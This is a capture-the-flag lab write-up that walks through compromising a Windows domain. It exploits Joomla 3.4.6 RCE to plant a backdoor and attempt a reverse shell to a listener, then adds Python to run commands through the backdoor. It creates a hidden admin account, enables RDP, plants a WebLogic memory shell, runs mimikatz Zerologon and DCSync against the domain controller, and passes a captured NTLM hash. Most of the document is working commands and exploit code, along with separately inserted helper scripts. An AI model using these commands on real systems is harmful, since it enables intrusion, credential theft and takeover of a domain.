cyberstrikelab-lab6

Information gathering

fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.20 is alive
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 3
192.168.10.10:80 open
192.168.10.233:22 open
192.168.10.20:139 open
192.168.10.10:139 open
192.168.10.20:135 open
192.168.10.20:445 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.20:5985 open
192.168.10.10:5985 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:47001 open
192.168.10.20:47001 open
192.168.10.20:49152 open
192.168.10.20:49153 open
192.168.10.20:49155 open
192.168.10.20:49154 open
192.168.10.20:49156 open
192.168.10.20:49157 open
192.168.10.20:49158 open
192.168.10.20:49159 open
192.168.10.10:49665 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49667 open
192.168.10.10:49669 open
192.168.10.10:49668 open
192.168.10.10:49670 open
[*] alive ports len is: 29
start vulscan
done 0/29 [-] mysql 192.168.10.10:3306 root 123456 Error 1130: Host '192.168.122.239' is not allowed to connect to this MySQL server
[*] WebTitle http://192.168.10.233:11333 code:404 len:19 title:None
[*] NetBios 192.168.10.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[*] WebTitle http://192.168.10.10:47001 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.10.10:5985 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.10.20:47001 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.10.20:5985 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.10.10 code:200 len:6060 title:Home
./qscan_mac_arm64  -t 192.168.10.10/24 -p 1-65535

┏┓┏┏┏┓┏┓
┗┫┛┗┗┻┛┗

Tips: the -t parameter now accepts a file path directly; the file: prefix is no longer needed
[+]2025/03/26 15:02:49 Current environment: darwin, output encoding: utf-8
[+]2025/03/26 15:02:49 Loaded HTTP fingerprints: [24758]
[+]2025/03/26 15:02:49 Loaded NMAP probes: [150], fingerprints: [11916]
[+]2025/03/26 15:02:50 Domain, IP, Port, URL and Hydra engines are ready
netbios-ns://192.168.10.20:137 netbios-ns ProductName:rosoftWindowsnetbios-n,OperatingSystem:Windows,Digest:"CKAAAAAAAAAAAAAAAAAAAA,Length:157,Port:137,Info:workgroup:CYBERSTRIKELA,Hostname:CYBERWEB
[*]2025/03/26 15:03:00 Live goroutines: IP: 36, Port: 36, URL: 0, Hydra: 0
[+]2025/03/26 15:03:09 All scan tasks have been dispatched
[+]2025/03/26 15:05:25 Total runtime: [2m35.263086s]

The site on 192.168.10.10 is running Joomla, so let's look into it.

Run joomscan against it.

Joomla RCE

The version turns out to be 3.4.6, which has a known RCE, so let's exploit it:
https://github.com/kiks7/rusty_joomla_rce

python rusty_joomla_exploit.py -t http://192.168.10.10/
[*] Starting ..
[*] Target URL: http://192.168.10.10/index.php/component/users
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Vulnerable
[*] Use --exploit to exploit it

Confirmed vulnerable; continue with the exploit.

python rusty_joomla_exploit.py -t http://192.168.10.10/ --exploit -l 172.16.233.2 -p 1122
[*] Starting ..
[*] Target URL: http://192.168.10.10/index.php/component/users
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Vulnerable
[*] Getting Session Cookie ..
[*] Getting CSRF Token ..
[*] Sending request ..
[+] Backdoor implanted, eval your code at http://192.168.10.10//configuration.php in a POST with wskxtmfinqeclwthnijshsnmyjuevxwotuhsrinyhimollhxhf
[*] Now it's time to reverse, trying with a system + perl

RCE achieved.
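The exploit output says the backdoor evaluates PHP posted to configuration.php in a single POST parameter whose name it prints. The writeup does not show how the later commands were sent through it, so here is an added helper (not part of the original post or of rusty_joomla_rce) that wraps an OS command in `system()` and POSTs it to that endpoint. The base URL and the parameter name `PARAM_FROM_EXPLOIT_OUTPUT` are placeholders to be replaced with the values the exploit printed; the request-building function is separated out so it can be checked offline.

```python
import urllib.parse
import urllib.request


def php_quote(s):
    """Single-quoted PHP string literal: only backslash and quote need escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_eval_request(base_url, param, php_code):
    """POST to the patched configuration.php; the backdoor evals the value of `param`."""
    url = base_url.rstrip("/") + "/configuration.php"
    body = urllib.parse.urlencode({param: php_code}).encode()
    return urllib.request.Request(url, data=body, method="POST")


def run_command(base_url, param, cmd, timeout=15):
    """Run an OS command through the backdoor and return the raw response body."""
    req = build_eval_request(base_url, param, "system(" + php_quote(cmd) + ");")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Placeholders: use the URL and POST parameter printed by the exploit.
    print(run_command("http://192.168.10.10/", "PARAM_FROM_EXPLOIT_OUTPUT", "whoami"))
```

Because the target is a Windows host (fscan later identifies it as WIN-P5ECGG92B08), the `net user` and `REG ADD` commands below can be passed to `run_command` one at a time.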

Internal network penetration

Uploading a file through the shell failed, so add a backdoor user and enable RDP to get in instead:

rem create a local account and make it an administrator
net user ocean admin@123 /add
net localgroup administrators ocean /add
rem enable Remote Desktop (fDenyTSConnections = 0) and open 3389 in the host firewall
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Look at the fscan results from this host:

(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.20 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 3
192.168.10.20:135 open
192.168.10.233:8080 open
192.168.10.20:7001 open
192.168.10.10:3306 open
192.168.10.20:445 open
192.168.10.10:445 open
192.168.10.20:139 open
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:80 open
192.168.10.233:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]192.168.10.10
[->]WIN-P5ECGG92B08
[->]192.168.10.10
[*] NetBios 192.168.10.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[*] WebTitle http://192.168.10.10 code:200 len:6060 title:Home
[*] WebTitle http://192.168.10.20:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan http://192.168.10.20:7001 [weblogic]

There is a WebLogic service on 192.168.10.20:7001. Throw the tooling at it.

It is vulnerable.

Then inject a Godzilla in-memory shell.

This host has two IPs, so first gather information on the second network:

192.168.20.20:139 open
192.168.20.30:135 open
192.168.20.30:88 open
192.168.20.20:7001 open
192.168.20.30:445 open
192.168.20.30:139 open
192.168.20.20:135 open
192.168.20.30:80 open
192.168.20.20:445 open
[*] NetInfo
[*]192.168.20.30
[->]WIN-9DJ4TH21IE9
[->]192.168.20.30
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.30 [+] DC:WIN-9DJ4TH21IE9.cyberstrikelab.com Windows Server 2016 Standard 14393
[+] MS17-010 192.168.20.30 (Windows Server 2016 Standard 14393)
[*] WebTitle http://192.168.20.30 code:200 len:703 title:IIS Windows Server
[+] PocScan http://192.168.20.30 poc-yaml-active-directory-certsrv-detect
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic]
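Both fscan runs (the 192.168.10.0/24 scan and the 192.168.20.0/24 scan from the pivot) are read by eye above. The following Python, added here and not part of the original post or of fscan, parses fscan's line format into a per-host table and pulls out the two facts the rest of the attack path hinges on: the NetBIOS name cyberweb.cyberstrikelab.com shows up at both 192.168.10.20 and 192.168.20.20 (the dual-homed pivot), and 192.168.20.30 is the domain controller. The sample lines are constructed from the output shapes shown above, not a verbatim copy of either scan.

```python
import re
from collections import defaultdict

# Constructed sample in fscan's line format (shapes taken from the scans above).
SAMPLE = """\
192.168.10.10:80 open
192.168.10.10:3306 open
192.168.10.20:7001 open
192.168.20.20:7001 open
192.168.20.30:88 open
192.168.20.30:445 open
[*] NetBios 192.168.10.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.30 [+] DC:WIN-9DJ4TH21IE9.cyberstrikelab.com Windows Server 2016 Standard 14393
[+] MS17-010 192.168.20.30 (Windows Server 2016 Standard 14393)
[*] WebTitle http://192.168.10.10 code:200 len:6060 title:Home
[+] InfoScan http://192.168.20.20:7001 [weblogic]
[+] PocScan http://192.168.20.30 poc-yaml-active-directory-certsrv-detect
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios {IP} (?:\[\+\] DC:)?(\S+) (.*)$")
VULN_RE = re.compile(rf"^\[\+\] (MS17-010) {IP}")
URL_RE = re.compile(rf"^\[[*+]\] (WebTitle|InfoScan|PocScan) https?://{IP}(?::\d+)? (.*)$")


def parse_fscan(text):
    """Group fscan output by IP: open ports, NetBIOS name/OS, DC flag, and findings."""
    hosts = defaultdict(lambda: {"ports": set(), "name": None, "os": None, "dc": False, "findings": []})
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NETBIOS_RE.match(line):
            h = hosts[m[1]]
            h["name"], h["os"], h["dc"] = m[2].lower(), m[3], "[+] DC:" in line
        elif m := VULN_RE.match(line):
            hosts[m[2]]["findings"].append(m[1])
        elif m := URL_RE.match(line):
            kind, ip, rest = m.groups()
            if kind != "WebTitle":        # only InfoScan/PocScan hits count as findings
                hosts[ip]["findings"].append(rest)
    return dict(hosts)


def dual_homed(hosts):
    """NetBIOS name -> IPs; a name seen under two addresses is a pivot candidate."""
    by_name = defaultdict(list)
    for ip, h in hosts.items():
        if h["name"]:
            by_name[h["name"]].append(ip)
    return {n: sorted(ips) for n, ips in by_name.items() if len(ips) > 1}


def likely_dcs(hosts):
    """Hosts fscan tagged as DC, or that expose Kerberos (88) together with SMB (445)."""
    return sorted(ip for ip, h in hosts.items() if h["dc"] or {88, 445} <= h["ports"])


if __name__ == "__main__":
    hosts = parse_fscan(SAMPLE)
    for ip in sorted(hosts, key=lambda a: tuple(map(int, a.split(".")))):
        h = hosts[ip]
        print(ip, h["name"] or "-", sorted(h["ports"]), h["findings"])
    print("dual-homed:", dual_homed(hosts))
    print("likely DCs:", likely_dcs(hosts))
```

Run it on a saved fscan result file by replacing `SAMPLE` with the file contents; lines the parser does not recognise (NetInfo, WebTitle, the banner) are simply skipped.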

You can see the scan turned up MS17-010. I set up a proxy and tried it with msf, but just like before it would not go through, so I switched straight to Zerologon.

Zerologon

Check whether the DC is vulnerable:

shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-9DJ4TH21IE9$" "exit"

Exploit it, which resets the DC machine account password to empty:

shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntlm /null /account:WIN-9DJ4TH21IE9$ /exploit" "exit"

DCSync with the now-empty machine account password to pull the administrator hash:

shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-9DJ4TH21IE9.cyberstrikelab.com /user:administrator /authuser:WIN-9DJ4TH21IE9$ /authpassword:\"\" /authntlm" "exit"
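The reason the exploit step may need to be repeated, and the reason the all-zero credential is accepted at all, is the Netlogon credential computation: AES-128 in CFB8 mode with a fixed all-zero IV, applied to the 8-byte client challenge. If the challenge is all zeros, the whole credential is zero whenever the first byte of AES_k(0^16) is zero, which happens for about 1 in 256 session keys, and each NetrServerAuthenticate3 retry gets a fresh key. The following is an added example, not from the page or from mimikatz, with a self-contained AES-128 so it runs offline. It assumes (a modelling choice, not something the page states) that every retry yields an independent uniformly random session key, and it models the August 2020 fix for CVE-2020-1472, under which the DC refuses authentication whose client challenge starts with five identical bytes.

```python
import random

# Minimal AES-128 (encrypt only), written out here so the example runs offline.
def _xtime(a):
    a <<= 1
    return (a ^ 0x11b) if a & 0x100 else a

def _gmul(a, b):                      # multiplication in GF(2^8)
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _gf_inv(x):                       # x**254 == 1/x for x != 0; 0 maps to 0
    r, e = 1, 254
    while e:
        if e & 1:
            r = _gmul(r, x)
        x, e = _gmul(x, x), e >> 1
    return r

SBOX = []
for _x in range(256):                 # inverse followed by the affine transform
    _v = _s = _gf_inv(_x)
    for _ in range(4):
        _v = ((_v << 1) | (_v >> 7)) & 0xff
        _s ^= _v
    SBOX.append(_s ^ 0x63)
MUL2 = [_xtime(i) for i in range(256)]
MUL3 = [i ^ MUL2[i] for i in range(256)]

def _expand_key(key):                 # 11 round keys of 16 bytes
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:                # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def aes128_encrypt_block(key, block):
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[((c + r) % 4) * 4 + r] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd < 10:                                                        # MixColumns
            s = sum(([MUL2[a] ^ MUL3[b] ^ c ^ d, a ^ MUL2[b] ^ MUL3[c] ^ d,
                      a ^ b ^ MUL2[c] ^ MUL3[d], MUL3[a] ^ b ^ c ^ MUL2[d]]
                     for a, b, c, d in (s[i:i + 4] for i in range(0, 16, 4))), [])
        s = [b ^ k for b, k in zip(s, rk[rnd])]                            # AddRoundKey
    return bytes(s)

def netlogon_credential(session_key, challenge):
    """ComputeNetlogonCredential (MS-NRPC 3.1.4.4.1): AES-128-CFB8 with an all-zero IV."""
    reg, out = bytearray(16), bytearray()
    for p in challenge:
        c = p ^ aes128_encrypt_block(session_key, bytes(reg))[0]
        out.append(c)
        reg = reg[1:] + bytes([c])    # the shift register only ever sees ciphertext bytes
    return bytes(out)

def zerologon_attempts(seed=1, max_tries=2048):
    """Attacker loop: NetrServerAuthenticate3 with an all-zero ClientChallenge and
    ClientCredential, retried until the DC's fresh session key makes the zero
    credential valid (P = 1/256 per try). Returns (attempt, key) or None.
    Assumption (not from the page): each retry yields an independent random key."""
    rng = random.Random(seed)
    for attempt in range(1, max_tries + 1):
        key = bytes(rng.getrandbits(8) for _ in range(16))
        if netlogon_credential(key, bytes(8)) == bytes(8):
            return attempt, key
    return None

def challenge_rejected_by_patched_dc(client_challenge):
    """Post-August-2020 DCs refuse Netlogon authentication whose ClientChallenge
    starts with five identical bytes, which is exactly what the zero challenge is."""
    return len(set(client_challenge[:5])) == 1

if __name__ == "__main__":
    hit = zerologon_attempts()
    if hit:
        print("zero credential accepted on attempt", hit[0],
              "because E_k(0)[0] ==", aes128_encrypt_block(hit[1], bytes(16))[0])
    print("patched DC rejects the zero challenge:", challenge_rejected_by_patched_dc(bytes(8)))
```

The `/exploit` step then uses the same zero-credential session to call NetrServerPasswordSet2 with an empty password, which is why the DCSync command above authenticates as the machine account with `/authpassword:""`. Resetting that password breaks the DC's own trust relationship until it is restored, so in a real engagement the original machine account password must be recovered and put back.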

Then just pass the hash:

proxychains4 python3 wmiexec.py -hashes :d8b3ed1de99ddc92f3cb8a5a356bb4d1 cyberstrikelab.com/administrator@192.168.20.30